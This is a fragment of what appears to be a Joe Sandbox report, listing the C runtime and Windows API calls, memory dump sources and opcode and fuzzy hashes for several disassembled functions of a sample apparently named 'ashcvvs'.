                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                            • String ID:
                            • API String ID: 4271482742-0
                            • Opcode ID: 4f7909c239fe3fb2b9763dd1652ba7c177487cd15552de12b0bd16a717823477
                            • Instruction ID: 1a3862eaffe938a5a04654e4f95986a4a86c562000797629d9b52b1ba9018c53
                            • Opcode Fuzzy Hash: 4f7909c239fe3fb2b9763dd1652ba7c177487cd15552de12b0bd16a717823477
                            • Instruction Fuzzy Hash: A7012A31A01A22DBCA21AB66980675F7760FF04715F54413BE904B76D1CB3C5952CEDE

                            Control-flow Graph

                            APIs
                            • __lock.LIBCMT ref: 004010CB
                              • Part of subcall function 0040285B: __mtinitlocknum.LIBCMT ref: 00402871
                              • Part of subcall function 0040285B: __amsg_exit.LIBCMT ref: 0040287D
                              • Part of subcall function 0040285B: EnterCriticalSection.KERNEL32(0040265C,0040265C,?,004035BD,00000004,00428728,0000000C,0040673E,0040102A,0040266B,00000000,00000000,00000000,?,00404E6C,00000001), ref: 00402885
                            • ___sbh_find_block.LIBCMT ref: 004010D6
                            • ___sbh_free_block.LIBCMT ref: 004010E5
                            • HeapFree.KERNEL32(00000000,0040102A,00428680,0000000C,0040283C,00000000,00428708,0000000C,00402876,0040102A,0040265C,?,004035BD,00000004,00428728,0000000C), ref: 00401115
                            • GetLastError.KERNEL32(?,004035BD,00000004,00428728,0000000C,0040673E,0040102A,0040266B,00000000,00000000,00000000,?,00404E6C,00000001,00000214), ref: 00401126
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                            • String ID:
                            • API String ID: 2714421763-0
                            • Opcode ID: ba79612b5d8776600ab4de6d9d473ae021ce5076515930a07278760b3adc5ee0
                            • Instruction ID: 8961604c9efdb82a7c022f95c56f03fbdb1ca628a5d7b3b1d8682caae66e3d49
                            • Opcode Fuzzy Hash: ba79612b5d8776600ab4de6d9d473ae021ce5076515930a07278760b3adc5ee0
                            • Instruction Fuzzy Hash: 91018431901211DADB357FB2A90AB4E3A649F04B15F10413FF6547A1E1CA7C85418A9D

                            Control-flow Graph

                            APIs
                            • GetModuleHandleA.KERNEL32(KERNEL32,00423B6F), ref: 004246CC
                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004246DC
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: IsProcessorFeaturePresent$KERNEL32
                            • API String ID: 1646373207-3105848591
                            • Opcode ID: 650bc48674ae330932e524258421bb0110a511ee22e69581295ed82ba26d40f9
                            • Instruction ID: a45b55ef62fe2cddc5a1fc2af0cd6119b8d81e54aebd11f2c10a25c51e0f7d02
                            • Opcode Fuzzy Hash: 650bc48674ae330932e524258421bb0110a511ee22e69581295ed82ba26d40f9
                            • Instruction Fuzzy Hash: 76F03030B01A1AE2DB106BA1BD0E76F7BB8FFC1741FD20595D591A0094DF7880B5C64E

                            Control-flow Graph

                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004082D2
                            • __isleadbyte_l.LIBCMT ref: 00408306
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00408337
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 004083A5
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 57784c86470ed8ff91c809e530559af945dd142c3226e4a84c623129bcb00e67
                            • Instruction ID: 2131b2d15cd432383d47f6c14abb9ff0fc8b04249a1240ce69537125248ea617
                            • Opcode Fuzzy Hash: 57784c86470ed8ff91c809e530559af945dd142c3226e4a84c623129bcb00e67
                            • Instruction Fuzzy Hash: 1A31D331A10245EFCB20DFA8C9849BE3BA5BF01310F1585BEE491AB2D1DB35DD50DB58

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction ID: 79eb0d46623e3e840f5a8a74d676871430ce86260699b964cc8067b3add82cac
                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction Fuzzy Hash: 8A117232600159BBCF225E84EC01CEE3F62FB59754B998416FA1955130C63ACAB2AB89

                            Control-flow Graph

                            APIs
                            • __getptd.LIBCMT ref: 00406658
                              • Part of subcall function 00404EBA: __getptd_noexit.LIBCMT ref: 00404EBD
                              • Part of subcall function 00404EBA: __amsg_exit.LIBCMT ref: 00404ECA
                            • __getptd.LIBCMT ref: 0040666F
                            • __amsg_exit.LIBCMT ref: 0040667D
                            • __lock.LIBCMT ref: 0040668D
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID:
                            • API String ID: 3521780317-0
                            • Opcode ID: 89bb69dbc30f51cdb6260ca9e6788ceaff053369bdb7183063236ed47fa0266e
                            • Instruction ID: 76af6fb7642dac4c6fc83e8a51a4ea9dfe5e15d74b56128012a1f83f10435fa7
                            • Opcode Fuzzy Hash: 89bb69dbc30f51cdb6260ca9e6788ceaff053369bdb7183063236ed47fa0266e
                            • Instruction Fuzzy Hash: 52F06231900210CFD620BBB6C40674E77A0AB00719F524A3FE845B73D1CB3D99118A9E

                            Control-flow Graph

                            APIs
                            • GetModuleHandleW.KERNEL32(0043A3B0,00000000,?,?,00423A96,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423551
                            • GetProcAddress.KERNEL32(00000000,0042C638), ref: 0042358E
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID:
                            • API String ID: 1646373207-3916222277
                            • Opcode ID: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction ID: d0582955cadd0fc5f4b94350803a6a31df697eece703d4cb31990996f5db6057
                            • Opcode Fuzzy Hash: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction Fuzzy Hash: 8E31531569C3C0D8E331CBA8BC857297B62AB15B14F54347AD9848B2F1D3FA056A836F